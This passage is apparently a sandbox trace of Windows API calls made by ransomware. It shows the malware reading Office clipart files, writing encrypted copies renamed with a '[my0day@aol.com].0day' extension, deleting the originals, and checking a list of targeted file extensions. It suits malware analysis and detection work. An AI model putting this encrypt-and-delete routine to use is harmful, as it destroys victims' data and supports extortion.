dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.662] GetLastError () returned 0x0 [0269.662] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x30c2, lpOverlapped=0x0) returned 1 [0269.664] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0269.665] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.665] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.666] SetEndOfFile (hFile=0x390) returned 1 [0269.666] CloseHandle (hObject=0x390) returned 1 [0269.666] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.666] SetEndOfFile (hFile=0x388) returned 1 [0269.669] CloseHandle (hObject=0x388) returned 1 [0269.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 1 [0269.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.669] lstrlenW (lpString=".doc") returned 4 [0269.669] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.669] lstrlenW (lpString=".docx") returned 5 [0269.669] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.669] lstrlenW (lpString=".pdf") returned 4 [0269.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString=".xls") returned 4 [0269.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.670] lstrlenW (lpString=".xlsx") returned 5 [0269.670] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.670] lstrlenW (lpString=".ppt") returned 4 [0269.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.670] lstrlenW (lpString=".zip") returned 4 [0269.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.670] lstrlenW (lpString=".rar") returned 4 [0269.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString=".bz2") returned 4 [0269.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString=".7z") returned 3 [0269.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.670] lstrlenW (lpString=".dbf") returned 4 [0269.670] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.670] lstrlenW (lpString=".1cd") returned 4 [0269.670] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.670] lstrlenW (lpString=".jpg") returned 4 [0269.670] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.670] lstrlenW (lpString=".doc") returned 4 [0269.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString=".docx") returned 5 [0269.671] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.671] lstrlenW (lpString=".pdf") returned 4 [0269.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString=".xls") returned 4 [0269.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.671] lstrlenW (lpString=".xlsx") returned 5 [0269.671] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.671] lstrlenW (lpString=".ppt") returned 4 [0269.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.671] lstrlenW (lpString=".zip") returned 4 [0269.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.671] lstrlenW (lpString=".rar") returned 4 [0269.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString=".bz2") returned 4 [0269.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString=".7z") returned 3 [0269.671] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.671] lstrlenW (lpString=".dbf") returned 4 [0269.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.671] lstrlenW (lpString=".1cd") returned 4 [0269.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0269.671] lstrlenW (lpString=".jpg") returned 4 [0269.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.671] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.672] lstrlenW (lpString="BL00296_.WMF") returned 12 [0269.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.672] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=812) returned 1 [0269.672] CloseHandle (hObject=0x388) returned 1 [0269.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 0x20 [0269.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.672] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.672] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.673] GetLastError () returned 0x0 [0269.673] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x32c, lpOverlapped=0x0) returned 1 [0269.675] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x330, lpOverlapped=0x0) returned 1 [0269.676] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.676] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.676] SetEndOfFile (hFile=0x390) returned 1 [0269.676] CloseHandle (hObject=0x390) returned 1 [0269.676] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.676] SetEndOfFile (hFile=0x388) returned 1 [0269.685] CloseHandle (hObject=0x388) returned 1 [0269.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.686] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 1 [0269.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.686] lstrlenW (lpString=".doc") returned 4 [0269.686] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString=".docx") returned 5 [0269.687] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.687] lstrlenW (lpString=".pdf") returned 4 [0269.687] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString=".xls") returned 4 [0269.687] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.687] lstrlenW (lpString=".xlsx") returned 5 [0269.687] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.687] lstrlenW (lpString=".ppt") returned 4 [0269.687] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.687] lstrlenW (lpString=".zip") returned 4 [0269.687] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.687] lstrlenW (lpString=".rar") returned 4 [0269.687] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString=".bz2") returned 4 [0269.687] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString=".7z") returned 3 [0269.687] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.687] lstrlenW (lpString=".dbf") returned 4 [0269.687] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.687] lstrlenW (lpString=".1cd") returned 4 [0269.687] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.687] lstrlenW (lpString=".jpg") returned 4 [0269.687] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.687] lstrlenW (lpString=".doc") returned 4 [0269.687] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.687] lstrlenW (lpString=".docx") returned 5 [0269.688] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.688] lstrlenW (lpString=".pdf") returned 4 [0269.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.688] lstrlenW (lpString=".xls") returned 4 [0269.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.688] lstrlenW (lpString=".xlsx") returned 5 [0269.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.688] lstrlenW (lpString=".ppt") returned 4 [0269.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.688] lstrlenW (lpString=".zip") returned 4 [0269.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.688] lstrlenW (lpString=".rar") returned 4 [0269.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.688] lstrlenW (lpString=".bz2") returned 4 [0269.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.688] lstrlenW (lpString=".7z") returned 3 [0269.688] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.688] lstrlenW (lpString=".dbf") returned 4 [0269.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.688] lstrlenW (lpString=".1cd") returned 4 [0269.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0269.688] lstrlenW (lpString=".jpg") returned 4 [0269.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.688] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.688] lstrlenW (lpString="BL00390_.WMF") returned 12 [0269.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.689] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=13102) returned 1 [0269.689] CloseHandle (hObject=0x388) returned 1 [0269.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 0x20 [0269.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.690] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.690] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.690] GetLastError () returned 0x0 [0269.690] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x332e, lpOverlapped=0x0) returned 1 [0269.692] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x3330, lpOverlapped=0x0) returned 1 [0269.694] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.694] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.694] SetEndOfFile (hFile=0x390) returned 1 [0269.694] CloseHandle (hObject=0x390) returned 1 [0269.694] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.694] SetEndOfFile (hFile=0x388) returned 1 [0269.785] CloseHandle (hObject=0x388) returned 1 [0269.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.419] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 1 [0270.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.446] lstrlenW (lpString=".doc") returned 4 [0270.446] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.446] lstrlenW (lpString=".docx") returned 5 [0270.446] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.447] lstrlenW (lpString=".pdf") returned 4 [0270.447] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString=".xls") returned 4 [0270.447] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.447] lstrlenW (lpString=".xlsx") returned 5 [0270.447] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.447] lstrlenW (lpString=".ppt") returned 4 [0270.447] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.447] lstrlenW (lpString=".zip") returned 4 [0270.447] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.447] lstrlenW (lpString=".rar") returned 4 [0270.447] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString=".bz2") returned 4 [0270.447] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString=".7z") returned 3 [0270.447] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.447] lstrlenW (lpString=".dbf") returned 4 [0270.447] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.447] lstrlenW (lpString=".1cd") returned 4 [0270.447] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.447] lstrlenW (lpString=".jpg") returned 4 [0270.447] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.447] lstrlenW (lpString=".doc") returned 4 [0270.447] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.447] lstrlenW (lpString=".docx") returned 5 [0270.447] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.447] lstrlenW (lpString=".pdf") returned 4 [0270.448] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.448] lstrlenW (lpString=".xls") returned 4 [0270.448] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.448] lstrlenW (lpString=".xlsx") returned 5 [0270.448] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.448] lstrlenW (lpString=".ppt") returned 4 [0270.448] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.448] lstrlenW (lpString=".zip") returned 4 [0270.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.448] lstrlenW (lpString=".rar") returned 4 [0270.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.448] lstrlenW (lpString=".bz2") returned 4 [0270.448] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.448] lstrlenW (lpString=".7z") returned 3 [0270.448] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.448] lstrlenW (lpString=".dbf") returned 4 [0270.448] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.448] lstrlenW (lpString=".1cd") returned 4 [0270.448] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0270.448] lstrlenW (lpString=".jpg") returned 4 [0270.448] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.448] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.449] lstrlenW (lpString="BL00526_.WMF") returned 12 [0270.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.454] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=27552) returned 1 [0270.454] CloseHandle (hObject=0x398) returned 1 [0270.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 0x20 [0270.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.483] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.483] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.499] GetLastError () returned 0x0 [0270.499] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x6ba0, lpOverlapped=0x0) returned 1 [0270.501] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x6bb0, lpOverlapped=0x0) returned 1 [0270.502] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.503] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, 